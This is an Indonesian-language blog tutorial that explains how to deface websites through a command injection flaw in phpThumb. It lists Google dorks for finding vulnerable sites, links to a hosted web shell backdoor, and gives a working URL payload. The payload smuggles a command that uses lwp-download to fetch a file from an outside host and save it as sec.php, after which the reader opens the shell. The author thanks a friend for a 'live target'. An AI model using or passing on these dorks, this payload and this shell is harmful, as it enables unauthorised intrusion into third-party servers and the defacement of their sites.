Ad Unit (Iklan) BIG

Cara deface phpThumb Command Injection to Upload shell

Post a Comment
-
Hai Sobat.
Saya ikal
Disini, saya akan share cara deface poc phpThumb Command Injection
-

Yaps, sesuai judul. apasih phpThumb itu? Cari sendiri hehe. Dan apa sih command Injection itu? Cari sendiri. Agar apa? Agar nih artikel tidak terlalu panjang. Okeh langsung saja.

Bahan : 
- dork : 
inurl:/images/phpThumb.php
inurl:/phpThumb.php
inurl:/phpThumb/phpThumb.php
- shell backdoor : 
https://smkn1pangandaran.sch.id/sec.txt
Payload / exploit : 
?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;lwp-download http://www.wanoja.com/Awokwokwokwokwok.txt sec.php;&phpThumbDebug=9

> pertama kalian cari file phpThumb.php nya, dengan cara mengklik open in new tab image yang ada lalu klik url. Atau kalian tidak perlu repot² mencarinya, kalian hanya perlu mendorking dengan dork dorking di google image, lalu open in new tab gambar nya dan cek url nya.
Contoh :

> lalu kalian tinggal salin exploit nya dan taruh di akhir url seperti /phpThumb.php?src=blablabla
> untuk meng-upload shell kalian bisa gunakan perintah lwp-download seperti exploit yang saya kasih di atas. Jika exploit sudah dimasukan kedalam url, tinggal kalian klik enter.

> Lalu kalian tinggal akses saja.
https://localhost/path/sec.php

Yah mungkin segini saja untuk artikel kali ini.
Thanks for my friend buat live targetnya xixixi from Team Hillusion Exploit ID
Greetz : Tex7ure

Thanks 
See u
Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

Post a Comment

Dapatkan Notifikasi Dengan Email